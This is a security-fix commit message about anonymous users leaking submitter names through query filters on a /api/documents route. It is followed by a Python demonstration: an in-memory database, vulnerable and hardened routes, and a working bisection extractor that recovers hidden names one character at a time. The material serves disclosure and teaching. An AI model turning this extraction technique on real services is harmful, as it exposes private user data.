Security fix: Anonymous users must not leak submitter names
The arbitrary jsonquery feature now needs to be explicitly enabled for routes and is only ever allowed for authenticated users (because they currently have access to all data anyway). For the /api/documents route, we manually parse and validate the query and build it from scratch for unauthenticated users, *without* reverting to jsonquery. Before, it was possible to efficiently extract submitted_by names by applying restrictions in the form of `submitted_by LIKE '<prefix>%'` to the /api/documents route. A proof of concept exploit has been developed using a bisection algorithm (interval halving) that extracts submitter names of arbitrary protocols (even those that have not been validated yet) in a matter of seconds.
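The leak the commit message describes, and the shape of the fix, as an added example that is not the project's code: an in-memory SQLite stand-in for the database, a "before" route that appends an arbitrary restriction verbatim while returning only public columns, a "after" route that rebuilds anonymous filters from an allow-list and reserves raw restrictions for authenticated callers, and an extractor that recovers `submitted_by` through the yes/no oracle. The table and column names (`documents`, `title`, `submitted_by`, `validated`), the allow-list, the character set of names, and the use of `>=` ordering comparisons for the interval halving (the commit message only mentions the `LIKE '<prefix>%'` form, which is used here to confirm each step) are all assumptions made for this illustration.

```python
import sqlite3
import string

# Constructed sample rows (not the project's data). The anonymous listing never
# returns submitted_by, yet the filter may mention it: that is the oracle.
SAMPLE_DOCUMENTS = [
    (1, "Budget 2023", "Alice Moore", 1),
    (2, "Minutes 2024-03", "Bob-Smith", 0),   # not validated yet; leaks just the same
    (3, "Agenda", "Carol", 1),
]
PUBLIC_COLUMNS = ("id", "title")                     # what anonymous callers may see
PUBLIC_FILTER_FIELDS = {"id", "title", "validated"}  # assumed allow-list for anonymous filters
# Assumed character set of submitter names, sorted by code point so that it agrees
# with SQLite's default BINARY collation used by >= on TEXT.
ALPHABET = sorted(string.ascii_letters + string.digits + " .-")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA case_sensitive_like = ON")  # SQLite LIKE is ASCII-case-insensitive by default
    conn.execute("CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT, submitted_by TEXT, validated INTEGER)")
    conn.executemany("INSERT INTO documents VALUES (?, ?, ?, ?)", SAMPLE_DOCUMENTS)
    return conn


def sql_str(value):
    """Quote a string literal for the restriction the attacker sends."""
    return "'" + value.replace("'", "''") + "'"


def documents_vulnerable(conn, where_sql):
    """'Before': an arbitrary restriction (stand-in for jsonquery) is appended
    verbatim. Only public columns are returned, but WHERE may touch any column."""
    sql = f"SELECT {', '.join(PUBLIC_COLUMNS)} FROM documents WHERE {where_sql}"
    return [dict(zip(PUBLIC_COLUMNS, row)) for row in conn.execute(sql)]


def documents_hardened(conn, filters, authenticated=False, raw_query=None):
    """'After': raw restrictions only for authenticated users (who may read every
    column anyway); anonymous filters are rebuilt from an allow-list, equality only."""
    if raw_query is not None:
        if not authenticated:
            raise PermissionError("arbitrary query restrictions require authentication")
        cols = PUBLIC_COLUMNS + ("submitted_by", "validated")
        sql = f"SELECT {', '.join(cols)} FROM documents WHERE {raw_query}"
        return [dict(zip(cols, row)) for row in conn.execute(sql)]
    clauses, params = [], []
    for field, value in filters.items():
        if field not in PUBLIC_FILTER_FIELDS:
            raise ValueError(f"anonymous callers may not filter on {field!r}")
        clauses.append(f"{field} = ?")        # field name comes from the allow-list, value is bound
        params.append(value)
    where = " AND ".join(clauses) or "1 = 1"
    sql = f"SELECT {', '.join(PUBLIC_COLUMNS)} FROM documents WHERE {where}"
    return [dict(zip(PUBLIC_COLUMNS, row)) for row in conn.execute(sql, params)]


def make_oracle(conn, endpoint):
    """Yes/no oracle: does document doc_id survive the extra restriction?"""
    def oracle(doc_id, restriction):
        return len(endpoint(conn, f"id = {int(doc_id)} AND ({restriction})")) == 1
    return oracle


def extract_submitter(oracle, doc_id, alphabet=ALPHABET, max_len=64):
    """Recover submitted_by one character at a time. At each position the predicate
    "submitted_by >= prefix || alphabet[k]" holds up to the index of the real next
    character and fails beyond it, so interval halving finds that index in about
    log2(len(alphabet)) queries; LIKE 'prefix%' then confirms the step."""
    prefix = ""
    while len(prefix) < max_len:
        # A name equal to the prefix sorts before prefix + alphabet[0]: extraction is
        # complete. (A next character below alphabet[0] would also stop here; it lies
        # outside the assumed charset.)
        if not oracle(doc_id, f"submitted_by >= {sql_str(prefix + alphabet[0])}"):
            return prefix
        lo, hi = 0, len(alphabet) - 1
        while lo < hi:                        # largest k for which the predicate holds
            mid = (lo + hi + 1) // 2
            if oracle(doc_id, f"submitted_by >= {sql_str(prefix + alphabet[mid])}"):
                lo = mid
            else:
                hi = mid - 1
        candidate = prefix + alphabet[lo]
        if not oracle(doc_id, f"submitted_by LIKE {sql_str(candidate + '%')}"):
            raise ValueError(f"next character after {prefix!r} is outside the assumed alphabet")
        prefix = candidate
    return prefix


def anonymous_can_filter_on(conn, field):
    """True if the hardened route lets an anonymous caller restrict on `field`."""
    try:
        documents_hardened(conn, {field: "x"})
        return True
    except ValueError:
        return False


def raw_query_allowed(conn, authenticated):
    """True if the hardened route accepts a raw restriction for this caller."""
    try:
        documents_hardened(conn, {}, authenticated=authenticated, raw_query="submitted_by LIKE 'C%'")
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    db = make_db()
    leak = make_oracle(db, documents_vulnerable)
    for doc_id, *_ in SAMPLE_DOCUMENTS:
        print(doc_id, extract_submitter(leak, doc_id))
    print("anonymous filter on submitted_by:", anonymous_can_filter_on(db, "submitted_by"))
```

Against the vulnerable route the extractor needs roughly eight oracle calls per character, which is why the commit message can speak of seconds; the validated flag never enters the oracle, so unvalidated documents leak the same way. The hardened route closes the channel not by escaping input but by refusing to let anonymous callers name `submitted_by` in a restriction at all, which is the only robust option when the filtered column is itself the secret.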
Showing 5 changed files with 70 additions and 17 deletions.